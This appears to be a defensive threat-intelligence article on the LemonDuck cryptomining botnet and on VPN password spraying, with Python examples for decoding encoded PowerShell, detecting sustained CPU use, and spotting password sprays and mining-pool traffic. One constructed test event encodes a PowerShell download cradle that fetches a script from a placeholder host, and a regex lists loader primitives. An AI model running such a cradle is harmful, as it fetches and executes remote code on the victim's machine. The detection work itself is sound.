Barracuda Researchers Detail LemonDuck Malware Campaign Hijacking Endpoints for Cryptomining

LemonDuck Cryptomining Malware Spreads via PowerShell in New Campaign

MEDIUM
June 26, 2026
4m read
Malware, Cyberattack


Executive Summary

Barracuda researchers have observed a recent campaign deploying the LemonDuck malware, a botnet that specializes in resource hijacking for cryptocurrency mining. The malware spreads laterally across networks by exploiting vulnerabilities and brute-forcing credentials, then uses infected endpoints' CPU and GPU resources to mine cryptocurrency for the attackers. The observed campaign utilized hidden PowerShell scripts to download additional payloads and maintain communication with its command-and-control (C2) infrastructure. Separately, the report highlights a significant 55% surge in password-spraying attacks originating from Iran, specifically targeting Fortigate VPNs, indicating a broader trend of attacks against remote access infrastructure.

Threat Overview

  • Malware: LemonDuck, a cryptomining botnet.
  • Primary Objective: Resource Hijacking (T1496 - Resource Hijacking). The malware uses the computational power of infected systems to mine cryptocurrency, generating profit for the operators.
  • Propagation: Spreads across networks by exploiting exposed services, using weak credentials, and leveraging known vulnerabilities.
  • Execution: Employs PowerShell scripts to download and execute malicious code, often in a hidden or fileless manner to evade detection.

While cryptomining is the primary goal, a botnet like LemonDuck also provides a persistent foothold in a network, which can be sold or repurposed for other malicious activities, such as deploying ransomware or launching DDoS attacks.

Technical Analysis

The LemonDuck campaign observed by Barracuda's SOC demonstrated several key TTPs:

  1. Initial Access: LemonDuck is known to gain initial access through various methods, including exploiting vulnerabilities like those in Microsoft Exchange (ProxyLogon) or brute-forcing credentials for services like SMB and RDP.
  2. Execution and Persistence: Upon gaining access, the malware executes PowerShell scripts. These scripts are often obfuscated and launched with parameters such as -WindowStyle Hidden and -EncodedCommand to keep the activity out of the user's sight. A hidden window only suppresses the console: the process, its command line and its script blocks remain visible to process auditing and PowerShell logging, which is what makes them good hunting material. The scripts are responsible for downloading the main mining payload and other malicious modules.
  3. Command and Control: The infected endpoint establishes communication with a C2 server. This allows the operators to update the malware, change the cryptocurrency being mined, or assign new tasks to the botnet.
  4. Lateral Movement: LemonDuck has worm-like capabilities, actively scanning the local network for other vulnerable systems to infect, thereby growing the botnet.

The separate finding of increased password-spraying attacks from Iran against Fortigate VPNs highlights a parallel threat. Attackers are systematically attempting to breach corporate networks by guessing common passwords for a large number of user accounts (T1110.003 - Password Spraying). A successful VPN compromise provides a direct entry point for deploying malware like LemonDuck.

Impact Assessment

While often considered less severe than ransomware, a LemonDuck infection can have significant business impacts:

  • Performance Degradation: The constant cryptomining activity consumes significant CPU and GPU resources, leading to severe performance degradation of workstations and servers. This can disrupt business applications and reduce employee productivity.
  • Increased Costs: On premises, sustained CPU and GPU load raises electricity and cooling costs and shortens hardware life. In cloud environments the same load shows up directly as higher compute bills, and where autoscaling reacts to CPU pressure it can silently add instances that are themselves infected.
  • Security Risk: The botnet provides a backdoor into the network. The operators could use this access to deploy more destructive malware, such as ransomware, at any time.
  • Network Saturation: The malware's lateral movement scanning can create excessive network traffic, potentially impacting network performance.

IOCs — Directly from Articles

No specific technical indicators of compromise were provided in the summarized articles.

Cyber Observables — Hunting Hints

To hunt for LemonDuck and similar cryptomining threats, security teams should look for:

  • process_name: powershell.exe, xmrig.exe. Monitor for PowerShell execution with encoded commands and for the presence of common mining software such as XMRig. Miner binaries are routinely renamed, so pair the name check with behaviour (sustained CPU, pool connections) rather than relying on it alone.
  • cpu_utilization: sustained high CPU usage. A workstation or server running at or near 100% CPU for extended periods with no legitimate reason is a strong indicator of cryptomining. Miners can be configured to cap their CPU use, so a lower but persistent baseline, especially outside working hours, also deserves a look.
  • network_traffic_pattern: stratum+tcp or stratum+ssl. Look for outbound connections to known cryptocurrency mining pools using the Stratum protocol (newline-delimited JSON-RPC over TCP or TLS).
  • log_source: VPN logs. For password spraying, look for a high volume of failed logins from a single IP across many different user accounts, and also for many accounts each failing once or twice from many different IPs, which is how a spray looks when it is routed through a proxy pool.

Detection & Response

  1. Performance Monitoring: Implement performance monitoring for all endpoints and servers. Configure alerts for any system exhibiting sustained high CPU usage (e.g., >90% for more than 30 minutes). This is a key part of D3FEND's Process Analysis (D3-PA).
  2. PowerShell Logging: Enable enhanced PowerShell logging (Script Block Logging and Module Logging) so the content of executed scripts is captured after decoding and de-obfuscation, even when the script never touches disk. Script Block Logging writes to the Microsoft-Windows-PowerShell/Operational log as event ID 4104; forward it to the SIEM, and treat a sudden stop in 4104 events from a host as a signal in itself, since an adversary with administrative rights can switch the logging off.
  3. Network Egress Filtering: Block outbound traffic to known cryptocurrency mining pool domains and ports at the firewall. This is an application of Outbound Traffic Filtering (D3-OTF).
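Script Block Logging (item 2) captures the script after it runs; the command line is available the moment the process starts, and decoding -EncodedCommand from process-creation events is usually the fastest triage step. The following is an added example written for this page, not code from Barracuda or the article's author. It assumes events with pid/image/cmdline fields (the shape of Sysmon event ID 1 or Windows 4688); the sample events, the encoded payload and the host example.invalid are constructed placeholders, and the indicator set and threshold are this example's own choices.

```python
"""Decode and triage PowerShell command lines from process-creation events.

Added example for this page, not code from Barracuda or the LemonDuck
analysis. The sample events below are constructed; the encoded payload is
a harmless download-cradle string built here for illustration, and
example.invalid is a placeholder host.
"""
import base64
import re

# PowerShell resolves any unambiguous parameter prefix, so -e, -ec, -en,
# -enc and -EncodedCommand are equivalent; loaders favour the short forms.
ENC_FLAG = re.compile(r"^[-/](e|ec|en|enc[a-z]*)$", re.I)
WIN_FLAG = re.compile(r"^[-/](w|wi|win[a-z]*)$", re.I)
NOPROFILE_FLAG = re.compile(r"^[-/]nop[a-z]*$", re.I)
EXECPOL_FLAG = re.compile(r"^[-/](ep|ex[a-z]*)$", re.I)
# Download / in-memory execution primitives typical of a stage-one loader.
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|Invoke-Expression|\biex\b|Start-BitsTransfer|FromBase64String",
    re.I,
)


def encode_command(script: str) -> str:
    """What -EncodedCommand expects: base64 over UTF-16LE (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_encoded_command(b64: str):
    """Return the script behind -EncodedCommand, or None if the token is not
    valid base64 of UTF-16LE text (the only encoding PowerShell accepts)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_cmdline(cmdline: str) -> dict:
    """Flag the loader traits the article describes and expose the decoded script."""
    tokens = cmdline.split()
    indicators, decoded = [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        step = 1
        if ENC_FLAG.match(tok):
            decoded = decode_encoded_command(nxt)
            if decoded is not None:
                indicators.append("encoded_command")
                step = 2  # skip the payload token so it is not re-parsed as a flag
        elif WIN_FLAG.match(tok) and nxt.lower() == "hidden":
            indicators.append("hidden_window")
            step = 2
        elif NOPROFILE_FLAG.match(tok):
            indicators.append("no_profile")
        elif EXECPOL_FLAG.match(tok) and nxt.lower() in ("bypass", "unrestricted"):
            indicators.append("execution_policy_bypass")
            step = 2
        i += step
    # Search the raw command line and the decoded script together: the cradle
    # may sit in either place.
    if CRADLE.search(cmdline + " " + (decoded or "")):
        indicators.append("download_cradle")
    return {"decoded": decoded, "indicators": indicators, "score": len(indicators)}


def triage(events, threshold: int = 2):
    """Return (pid, score, indicators) for events at or above the threshold."""
    hits = []
    for ev in events:
        res = analyze_cmdline(ev["cmdline"])
        if res["score"] >= threshold:
            hits.append((ev["pid"], res["score"], res["indicators"]))
    return hits


# Constructed process-creation events (shape of Sysmon ID 1 / Windows 4688).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"pid": 4133, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
    {"pid": 5001, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        res = analyze_cmdline(ev["cmdline"])
        print(ev["pid"], res["score"], res["indicators"], res["decoded"])
```

The prefix-matching regexes matter more than they look: a rule that only matches the literal string -EncodedCommand misses -e and -enc, which is what loaders actually use. The bypass-only event scores 1 and is not raised, which is deliberate; an admin running a signed inventory script with -ExecutionPolicy Bypass is routine, and it is the combination of traits that separates a loader from maintenance.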

Mitigation

  1. Patch Management: Aggressively patch vulnerabilities in internet-facing systems and common applications to prevent initial access. This aligns with M1051 - Update Software.
  2. Strong Password Policies and MFA: Enforce strong, unique passwords for all accounts and mandate MFA for all remote access (VPNs) and administrative interfaces. This directly counters password spraying and brute-force attacks and is a key control under M1027 - Password Policies and M1032 - Multi-factor Authentication.
  3. Endpoint Hardening: Restrict PowerShell for standard users where it is not required for their job function, for example by enforcing Constrained Language Mode through AppLocker or WDAC application-control policies rather than by removing the binary, which breaks management tooling. This limits user-driven initial access; a loader running as SYSTEM after a successful exploit is constrained only by application control, not by per-user restrictions. This is a form of M1028 - Operating System Configuration.

Timeline of Events

  • June 26, 2026: This article was published.

MITRE ATT&CK Mitigations

  • M1051 - Update Software: Keep all systems, especially internet-facing ones, patched to prevent exploitation.
  • M1032 - Multi-factor Authentication: Enforce MFA on all VPNs and remote access solutions to defeat password-spraying attacks.
  • M1027 - Password Policies: Enforce strong password policies, including a banned-password list, to hinder brute-force and password-spraying attempts. Account lockout mainly helps against brute force: a spray is paced to stay under lockout thresholds, and an aggressive lockout policy lets an attacker lock out large numbers of users on purpose, so rely on MFA and detection rather than tight lockouts.
  • M1037 - Filter Network Traffic: Block outbound connections to known cryptomining pools at the network perimeter.

D3FEND Defensive Countermeasures

To detect LemonDuck and other cryptominers, process and performance monitoring is key. Deploy an EDR or use native OS tools to monitor CPU utilization across all endpoints and configure alerts for any process that keeps CPU above a threshold (e.g., 80%) for an extended period (e.g., 15 minutes), raising the severity when that process is unsigned or runs from an unusual directory such as a user-writable path. For LemonDuck specifically, hunt for powershell.exe launched with an encoded command (-EncodedCommand, usually abbreviated -enc or -e) that either consumes sustained CPU itself or is the parent of the process that does, since the loader commonly starts the miner directly. This behavioral approach detects the mining activity regardless of which miner executable is used or what it has been renamed to.
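The thresholding above is easy to state and easy to get wrong (a single sample at 100% is not "sustained"; a backup agent at 90% for an hour is sustained but benign). The following added example, not code from the article's author or Barracuda, implements the rule as a consecutive-sample run with process-context ranking. The per-minute CPU samples, the process inventory, the trusted-directory list and the -enc payload on the parent's command line are all constructed for illustration.

```python
"""Sustained-CPU detector with process-context enrichment.

Added example, not code from the article's author or Barracuda. CPU samples
and the process inventory are constructed (one sample per minute per
process); the -enc payload in the parent command line is a harmless
constructed base64 string.
"""
import re

CPU_THRESHOLD = 80.0   # percent, the article's example threshold
SUSTAIN_MINUTES = 15   # consecutive one-minute samples, the article's example

# Directories where a signed, high-CPU process is at least plausible.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# -EncodedCommand and its accepted abbreviations on the parent's command line.
ENC_FLAG = re.compile(r"(^|\s)[-/](e|ec|en|enc[a-z]*)\s", re.I)


def longest_run_above(samples, threshold=CPU_THRESHOLD) -> int:
    """Length of the longest run of consecutive samples at or above threshold."""
    best = run = 0
    for value in samples:
        run = run + 1 if value >= threshold else 0
        best = max(best, run)
    return best


def process_context(proc) -> tuple:
    """Return (severity, reasons): 'high' when the process looks like a dropped
    miner, 'low' when it is signed, in a trusted path and has a normal parent."""
    reasons = []
    if not proc["signed"]:
        reasons.append("unsigned")
    if not proc["image"].lower().startswith(TRUSTED_DIRS):
        reasons.append("unusual_path")
    if (proc["parent_image"].lower().endswith("powershell.exe")
            and ENC_FLAG.search(proc["parent_cmdline"] + " ")):
        reasons.append("parent_powershell_encoded")
    return ("high" if reasons else "low"), reasons


def detect_sustained_cpu(samples_by_pid, processes,
                         threshold=CPU_THRESHOLD, minutes=SUSTAIN_MINUTES):
    """Alert on processes above threshold for at least `minutes` consecutive
    samples; rank by process context so a dropped miner sorts first."""
    alerts = []
    for pid, samples in samples_by_pid.items():
        run = longest_run_above(samples, threshold)
        if run < minutes:
            continue
        severity, reasons = process_context(processes[pid])
        alerts.append({"pid": pid, "image": processes[pid]["image"],
                       "minutes": run, "severity": severity, "reasons": reasons})
    return sorted(alerts, key=lambda a: (a["severity"] != "high", a["pid"]))


# Constructed inventory: a miner dropped by an encoded PowerShell loader, a
# short render job, an idle service, and a signed backup agent.
PROCESSES = {
    7788: {"image": r"C:\Users\Public\svchost.exe", "signed": False,
           "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           "parent_cmdline": "powershell.exe -w hidden -enc QQBCAEMA"},
    1204: {"image": r"C:\Program Files\Vendor\render.exe", "signed": True,
           "parent_image": r"C:\Windows\explorer.exe", "parent_cmdline": "explorer.exe"},
    3310: {"image": r"C:\Windows\System32\svchost.exe", "signed": True,
           "parent_image": r"C:\Windows\System32\services.exe", "parent_cmdline": "services.exe"},
    2200: {"image": r"C:\Program Files\Vendor\backup.exe", "signed": True,
           "parent_image": r"C:\Windows\System32\services.exe", "parent_cmdline": "services.exe"},
}
CPU_SAMPLES = {                      # 20 minutes, one sample per minute
    7788: [97.0] * 20,               # pegged the whole time
    1204: [95.0] * 12 + [4.0] * 8,   # busy, but under the 15-minute bar
    3310: [3.0] * 20,
    2200: [91.0] * 20,               # sustained, but signed and legitimate-looking
}

if __name__ == "__main__":
    for alert in detect_sustained_cpu(CPU_SAMPLES, PROCESSES):
        print(alert)
```

Both 7788 and 2200 cross the CPU bar; only 7788 is high severity, because it is unsigned, runs from C:\Users\Public under the name of a system binary, and was started by an encoded PowerShell command. The masquerading name is exactly why the path check compares the full image path rather than the file name.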

To counter the password-spraying attacks targeting Fortigate VPNs, organizations must implement authentication event thresholding. Ingest VPN authentication logs into a SIEM and create a rule that triggers when a single source IP address generates a high number of failed logins across many different user accounts within a short time frame (e.g., more than 20 failed logins for 10+ distinct users from one IP in 5 minutes). This is the classic signature of a password spray from a single host. Sprays routed through proxy pools or residential botnets spread the attempts over many IPs, so add a second, organization-wide rule: many distinct accounts each failing once or twice within the window, from many sources. The automated response for the single-source case should be to temporarily block the source IP at the firewall, preventing the attacker from continuing and potentially guessing a valid password; exempt the shared NAT egress addresses of offices and partners so a misfire does not cut off legitimate users.
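Both rules above, the single-source threshold and the organization-wide variant for sprays spread over many IPs, implemented over a constructed log. This is an added example written for this page, not code from the article's author, Barracuda or Fortinet: the key=value field names ts, src, user and result are an assumption to be mapped onto your VPN's log schema, the thresholds are the article's example values, the never-block set is a placeholder, and all addresses come from the documentation ranges 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24.

```python
"""Password-spray detection over VPN authentication logs.

Added example, not from the article or from Fortinet. The log lines are
constructed key=value records (field names ts/src/user/result are an
assumption; map them to your VPN's schema). Addresses come from the
documentation ranges 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
# Single-source rule from the article: many failures across many users from one IP.
PER_IP_FAILS, PER_IP_USERS = 20, 10
# Organisation-wide rule for sprays spread over many source IPs: many distinct
# users failing, each only once or twice, from many sources in the window.
ORG_USERS, ORG_MAX_PER_USER, ORG_MIN_SOURCES = 25, 2, 10
# Shared egress IPs that must never be auto-blocked (constructed value).
NEVER_BLOCK = {"198.51.100.4"}


def build_sample_log():
    """Constructed events: one user who mistypes twice, one single-IP spray,
    and one spray spread across 30 proxies hitting one account each."""
    t0 = datetime(2026, 6, 26, 8, 0, 0)

    def stamp(seconds):
        return (t0 + timedelta(seconds=seconds)).isoformat()

    lines = [f"ts={stamp(30 * i)} src=198.51.100.4 user=alice result={r}"
             for i, r in enumerate(["fail", "fail", "success"])]
    lines += [f"ts={stamp(10 * i)} src=203.0.113.7 user=user{i:02d} result=fail"
              for i in range(25)]
    lines += [f"ts={stamp(5 * i)} src=192.0.2.{i + 1} user=emp{i:02d} result=fail"
              for i in range(30)]
    return lines


def parse_log(lines):
    """key=value lines -> dicts with a datetime ts, sorted by time."""
    events = []
    for line in lines:
        kv = dict(tok.split("=", 1) for tok in line.split())
        kv["ts"] = datetime.fromisoformat(kv["ts"])
        events.append(kv)
    return sorted(events, key=lambda e: e["ts"])


def detect_single_source_spray(events):
    """Source IPs that produced >= PER_IP_FAILS failures for >= PER_IP_USERS
    distinct users inside one sliding WINDOW."""
    recent = defaultdict(deque)
    flagged = set()
    for ev in events:
        if ev["result"] != "fail":
            continue
        q = recent[ev["src"]]
        q.append(ev)
        while ev["ts"] - q[0]["ts"] > WINDOW:
            q.popleft()
        if len(q) >= PER_IP_FAILS and len({e["user"] for e in q}) >= PER_IP_USERS:
            flagged.add(ev["src"])
    return flagged


def detect_distributed_spray(events):
    """First window in which many users fail a couple of times each from many
    sources; returns None if the pattern never appears."""
    q = deque()
    for ev in events:
        if ev["result"] != "fail":
            continue
        q.append(ev)
        while ev["ts"] - q[0]["ts"] > WINDOW:
            q.popleft()
        per_user = defaultdict(int)
        for e in q:
            per_user[e["user"]] += 1
        sources = {e["src"] for e in q}
        if (len(per_user) >= ORG_USERS and max(per_user.values()) <= ORG_MAX_PER_USER
                and len(sources) >= ORG_MIN_SOURCES):
            return {"ts": ev["ts"], "users": len(per_user), "sources": len(sources)}
    return None


def sources_to_block(flagged):
    """Automated response: block flagged IPs, minus shared NAT/partner egress."""
    return sorted(flagged - NEVER_BLOCK)


if __name__ == "__main__":
    evs = parse_log(build_sample_log())
    print("single-source:", sources_to_block(detect_single_source_spray(evs)))
    print("distributed:", detect_distributed_spray(evs))
```

Run against only the 192.0.2.x events, the single-source rule stays silent while the distributed rule fires: that gap is the reason for the second rule. The per-user cap (at most two failures each) is what keeps a handful of users with forgotten passwords from tripping it.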

A direct way to neutralize cryptomining malware is to block its ability to communicate with the mining pool. Maintain a threat intelligence feed of known cryptocurrency mining pool domains and IP addresses and configure the perimeter firewall or web proxy to block all outbound connections to them. Note that stratum+tcp and stratum+ssl are URL schemes in miner configuration, not distinct wire protocols: on the wire, Stratum is newline-delimited JSON-RPC over TCP or TLS, typically on ports such as 3333, 4444, 5555, 7777 and 14444. A port-based rule is therefore a useful weak signal, but pools also listen on 443 and operators can route through a proxy, so where traffic is inspectable match the protocol itself (JSON-RPC methods such as login, mining.subscribe and mining.authorize, and miner user-agent strings). With pool access cut off, an infected machine cannot receive work or submit shares, which makes the infection unprofitable for the attacker and stops the resource hijacking, though the implant itself remains and still needs removal.
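A classifier that combines the three signals just described (known pool destination, Stratum port, Stratum content), as an added example for this page rather than code from Barracuda or the article's author. The flows, the hostnames under example.invalid and the pool denylist are constructed; the JSON-RPC shapes are the ones XMRig-style (login/submit) and Bitcoin-style (mining.subscribe/authorize) Stratum clients send, with placeholder field values.

```python
"""Stratum (mining-pool) traffic classifier for egress flows.

Added example, not from the article or Barracuda. Flows, hostnames
(*.example.invalid) and the pool denylist are constructed; the JSON-RPC
shapes are the ones XMRig-style (login/submit) and Bitcoin-style
(mining.subscribe/authorize) Stratum clients send, but the field values
here are placeholders.
"""
import json

# Constructed denylist; in practice feed this from threat intel.
POOL_DENYLIST = {"pool.example.invalid", "xmr.example.invalid"}
# Ports pools commonly listen on. Noisy on their own: treat as a weak signal.
STRATUM_PORTS = {3333, 4444, 5555, 7777, 14444}
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit",
                   "login", "submit", "keepalived"}


def stratum_messages(payload: bytes):
    """Parse newline-delimited JSON-RPC and return the Stratum methods seen."""
    methods = []
    for line in payload.split(b"\n"):
        line = line.strip()
        if not line.startswith(b"{"):
            continue
        try:
            msg = json.loads(line)
        except ValueError:
            continue
        if isinstance(msg, dict) and msg.get("method") in STRATUM_METHODS:
            methods.append(msg["method"])
    return methods


def miner_agent(payload: bytes):
    """User agent a miner announces: 'agent' in an XMRig-style login, or
    params[0] in a mining.subscribe."""
    for line in payload.split(b"\n"):
        try:
            msg = json.loads(line.strip() or b"{}")
        except ValueError:
            continue
        if not isinstance(msg, dict):
            continue
        params = msg.get("params")
        if msg.get("method") == "login" and isinstance(params, dict):
            return params.get("agent")
        if msg.get("method") == "mining.subscribe" and isinstance(params, list) and params:
            return params[0] if isinstance(params[0], str) else None
    return None


def classify_flow(flow):
    """Return (verdict, reasons). Block on a known pool or Stratum content;
    a suspicious port alone is only queued for review."""
    reasons = []
    if flow["dst"].lower() in POOL_DENYLIST:
        reasons.append("known_pool_host")
    if flow["dport"] in STRATUM_PORTS:
        reasons.append("stratum_port")
    methods = stratum_messages(flow["payload"])
    if methods:
        reasons.append("stratum_jsonrpc:" + ",".join(methods))
    agent = miner_agent(flow["payload"])
    if agent:
        reasons.append("agent:" + agent)
    if "known_pool_host" in reasons or methods:
        return "block", reasons
    return ("review" if reasons else "allow"), reasons


# Constructed flows: first bytes of the client's payload, as an egress sensor
# would capture them before TLS or after decryption at a proxy.
SAMPLE_FLOWS = [
    {"dst": "pool.example.invalid", "dport": 3333,
     "payload": b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"XMRig/6.0.0","algo":["rx/0"]}}\n'},
    {"dst": "203.0.113.55", "dport": 443,   # same protocol on a port a port-only rule misses
     "payload": b'{"id":1,"method":"login","params":{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"XMRig/6.0.0"}}\n'},
    {"dst": "198.51.100.20", "dport": 3333,  # port collision with an ordinary HTTP service
     "payload": b"GET /health HTTP/1.1\r\nHost: 198.51.100.20\r\n\r\n"},
    {"dst": "api.example.invalid", "dport": 443,
     "payload": b'{"id":1,"method":"getStatus","params":[]}\n'},
    {"dst": "btcpool.example.invalid", "dport": 3333,
     "payload": b'{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5.1"]}\n{"id":2,"method":"mining.authorize","params":["worker.1","x"]}\n'},
]

if __name__ == "__main__":
    for flow in SAMPLE_FLOWS:
        print(flow["dst"], flow["dport"], classify_flow(flow))
```

The second flow is the case that matters: an unknown destination on 443 that a domain or port rule would wave through, blocked purely because the first message is a Stratum login. The third flow shows the opposite failure, a legitimate service on 3333 that a port-only block would break; it is held for review instead.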

Sources & References

Weekly Intelligence Report - 26 Jun 2026
CYFIRMA (cyfirma.com) June 26, 2026

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Areas: Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

LemonDuck, Cryptomining, Botnet, PowerShell, Barracuda, Password Spraying, Fortigate
